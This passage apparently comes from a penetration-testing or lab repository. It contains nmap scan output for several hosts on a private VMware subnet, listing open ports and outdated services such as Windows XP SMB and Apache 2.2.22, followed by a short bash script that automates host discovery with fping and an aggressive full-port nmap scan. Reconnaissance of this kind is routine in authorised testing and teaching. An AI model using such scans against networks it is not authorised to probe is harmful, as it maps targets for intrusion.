(VMware) No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ). TCP/IP fingerprint: OS:SCAN(V=7.91%E=4%D=2/17%OT=22%CT=1%CU=39056%PV=Y%DS=1%DC=D%G=Y%M=005056%T OS:M=602DDDF5%P=x86_64-pc-linux-gnu)SEQ(SP=100%GCD=1%ISR=10F%TI=Z%CI=I%II=I OS:%TS=8)OPS(O1=M4E7ST11NW2%O2=M4E7ST11NW2%O3=M4E7NNT11NW2%O4=M4E7ST11NW2%O OS:5=M4E7ST11NW2%O6=M4E7ST11)WIN(W1=3890%W2=3890%W3=3890%W4=3890%W5=3890%W6 OS:=3890)ECN(R=Y%DF=Y%T=40%W=3908%O=M4E7NNSNW2%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O OS:%A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD= OS:0%Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0% OS:S=A%A=Z%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1( OS:R=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI= OS:N%T=40%CD=S) Network Distance: 1 hop Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel Nmap scan report for 10.142.111.48 Host is up (0.056s latency). Not shown: 996 closed ports PORT STATE SERVICE VERSION 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 445/tcp open microsoft-ds Microsoft Windows XP microsoft-ds 3389/tcp open ms-wbt-server Microsoft Terminal Services MAC Address: 00:50:56:A0:57:E5 (VMware) No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ). TCP/IP fingerprint: OS:SCAN(V=7.91%E=4%D=2/17%OT=135%CT=1%CU=39985%PV=Y%DS=1%DC=D%G=Y%M=005056% OS:TM=602DDDF5%P=x86_64-pc-linux-gnu)SEQ(SP=FD%GCD=2%ISR=10C%TI=I%CI=I%II=I OS:%SS=S%TS=0)OPS(O1=M4E7NW0NNT00NNS%O2=M4E7NW0NNT00NNS%O3=M4E7NW0NNT00%O4= OS:M4E7NW0NNT00NNS%O5=M4E7NW0NNT00NNS%O6=M4E7NNT00NNS)WIN(W1=FFFF%W2=FFFF%W OS:3=FFFF%W4=FFFF%W5=FFFF%W6=FFFF)ECN(R=Y%DF=Y%T=80%W=FFFF%O=M4E7NW0NNS%CC= OS:N%Q=)T1(R=Y%DF=Y%T=80%S=O%A=S+%F=AS%RD=0%Q=)T2(R=Y%DF=N%T=80%W=0%S=Z%A=S OS:%F=AR%O=%RD=0%Q=)T3(R=Y%DF=Y%T=80%W=FFFF%S=O%A=S+%F=AS%O=M4E7NW0NNT00NNS OS:%RD=0%Q=)T4(R=Y%DF=N%T=80%W=0%S=A%A=O%F=R%O=%RD=0%Q=)T5(R=Y%DF=N%T=80%W= OS:0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=N%T=80%W=0%S=A%A=O%F=R%O=%RD=0%Q=)T OS:7(R=Y%DF=N%T=80%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T=80%IPL=B0%UN= OS:0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=S%T=80%CD=Z) Network Distance: 1 hop Service Info: OSs: Windows, Windows XP; CPE: cpe:/o:microsoft:windows, cpe:/o:microsoft:windows_xp Nmap scan report for 10.142.111.96 Host is up (0.055s latency). Not shown: 999 closed ports PORT STATE SERVICE VERSION 80/tcp open http Apache httpd 2.2.22 ((Debian)) MAC Address: 00:50:56:A0:1C:4F (VMware) No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ). TCP/IP fingerprint: OS:SCAN(V=7.91%E=4%D=2/17%OT=80%CT=1%CU=40537%PV=Y%DS=1%DC=D%G=Y%M=005056%T OS:M=602DDDF5%P=x86_64-pc-linux-gnu)SEQ(SP=104%GCD=1%ISR=10C%TI=Z%CI=I%II=I OS:%TS=8)OPS(O1=M4E7ST11NW2%O2=M4E7ST11NW2%O3=M4E7NNT11NW2%O4=M4E7ST11NW2%O OS:5=M4E7ST11NW2%O6=M4E7ST11)WIN(W1=3890%W2=3890%W3=3890%W4=3890%W5=3890%W6 OS:=3890)ECN(R=Y%DF=Y%T=40%W=3908%O=M4E7NNSNW2%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O OS:%A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD= OS:0%Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0% OS:S=A%A=Z%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1( OS:R=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI= OS:N%T=40%CD=S) Network Distance: 1 hop Nmap scan report for 10.142.111.99 Host is up (0.056s latency). Not shown: 997 filtered ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 5.4p1 (FreeBSD 20100308; protocol 2.0) 53/tcp open domain dnsmasq 2.55 80/tcp open http lighttpd 1.4.29 MAC Address: 00:50:56:A0:E5:3E (VMware) Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port Device type: general purpose|specialized|media device Running (JUST GUESSING): OpenBSD 4.X|3.X|5.X (94%), Comau embedded (86%), FreeBSD 7.X|9.X (86%), Apple Apple TV 5.X (85%) OS CPE: cpe:/o:openbsd:openbsd:4.3 cpe:/o:freebsd:freebsd:7.0 cpe:/o:openbsd:openbsd:3 cpe:/o:openbsd:openbsd:4 cpe:/a:apple:apple_tv:5.2.1 cpe:/a:apple:apple_tv:5.3 cpe:/o:freebsd:freebsd:9.1 Aggressive OS guesses: OpenBSD 4.3 (94%), Comau C4G robot control unit (86%), FreeBSD 7.0-RELEASE (86%), OpenBSD 3.8 - 4.7 (85%), OpenBSD 4.9 - 5.1 (85%), OpenBSD 5.2 (85%), Apple TV 5.2.1 or 5.3 (85%), FreeBSD 9.1-PRERELEASE (85%) No exact OS matches for host (test conditions non-ideal). Network Distance: 1 hop Service Info: OS: FreeBSD; CPE: cpe:/o:freebsd:freebsd Nmap scan report for 10.142.111.100 Host is up (0.055s latency). All 1000 scanned ports on 10.142.111.100 are closed MAC Address: 00:50:56:A0:1C:4F (VMware) Too many fingerprints match this host to give specific OS details Network Distance: 1 hop Nmap scan report for 10.142.111.240 Host is up (0.000058s latency). All 1000 scanned ports on 10.142.111.240 are closed Too many fingerprints match this host to give specific OS details Network Distance: 0 hops OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . # Nmap done at Wed Feb 17 22:24:38 2021 -- 7 IP addresses (7 hosts up) scanned in 35.93 seconds ================================================ FILE: scripts/eEnum.sh ================================================ #!/bin/bash # A wrapper for fping and nmap to help automate the host enumeration. TARGET=$1 HOST_FILE="alive_hosts.txt" OUT_FILE="nmap_scan.txt" print_usage() { echo "Usage: $0 " } scan() { echo "++ starting fping scan ++" fping -a -g $TARGET 2>/dev/null | tee $HOST_FILE; echo "" echo "++ starting nmap scan ++" sudo nmap -p- -A -T4 -iL $HOST_FILE -oN $OUT_FILE; } if [ -z "$TARGET" ]; then print_usage exit 1 fi scan